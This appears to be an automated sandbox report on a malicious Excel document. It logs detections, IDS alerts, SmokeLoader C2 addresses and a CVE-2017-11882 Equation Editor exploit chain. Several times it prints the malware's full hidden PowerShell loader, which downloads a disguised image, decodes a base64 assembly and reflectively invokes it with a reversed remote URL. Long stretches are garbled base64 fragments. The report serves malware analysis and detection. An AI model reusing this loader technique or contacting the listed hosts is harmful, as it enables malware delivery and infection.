?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3416, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 4052, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3692, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2984, TargetFilename: C:\Users\user\AppData\Local\Temp\t1fwdssb.xrn.ps1

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Timestamp:2024-08-31T15:51:50.730698+0200
            SID:2039103
            Severity:1
            Source Port:49174
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T15:51:45.412770+0200
            SID:2039103
            Severity:1
            Source Port:49173
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-31T15:51:45.746647+0200
            SID:2829848
            Severity:2
            Source Port:80
            Destination Port:49173
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-31T15:51:21.432233+0200
            SID:2049038
            Severity:1
            Source Port:443
            Destination Port:49171
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgURL Reputation: Label: malware
            Source: http://prolinice.ga/index.phpAvira URL Cloud: Label: malware
            Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
            Source: prolinice.gaVirustotal: Detection: 15%Perma Link
            Source: http://vilendar.ga/index.phpVirustotal: Detection: 16%Perma Link
            Source: http://prolinice.ga/index.phpVirustotal: Detection: 18%Perma Link
            Source: http://prolinice.ga/Virustotal: Detection: 15%Perma Link
            Source: 40830001.xlsReversingLabs: Detection: 26%
            Source: 40830001.xlsVirustotal: Detection: 9%Perma Link
            Source: 40830001.xlsJoe Sandbox ML: detected
            Source: C:\Windows\explorer.exeCode function: 15_2_02805174 CryptAcquireContextA,15_2_02805174
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,19_2_000C3098
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,19_2_000C3717
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3E04 RtlCompareMemory,CryptUnprotectData,19_2_000C3E04
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1198 CryptBinaryToStringA,CryptBinaryToStringA,19_2_000C1198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,19_2_000C11E1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,19_2_000C123B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1FCE CryptUnprotectData,RtlMoveMemory,19_2_000C1FCE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,21_2_000826AC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0008178C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0008118D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00082404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_00082404
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_0008245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_0008245E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_0008263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_0008263E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00082799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,26_2_00082799
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_000825A4 CryptBinaryToStringA,CryptBinaryToStringA,26_2_000825A4

            Exploits

            barindex
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.94.148.16 Port: 80Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: ~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp.4.drStream path '_1786603024/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp.4.drStream path '_1786603027/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
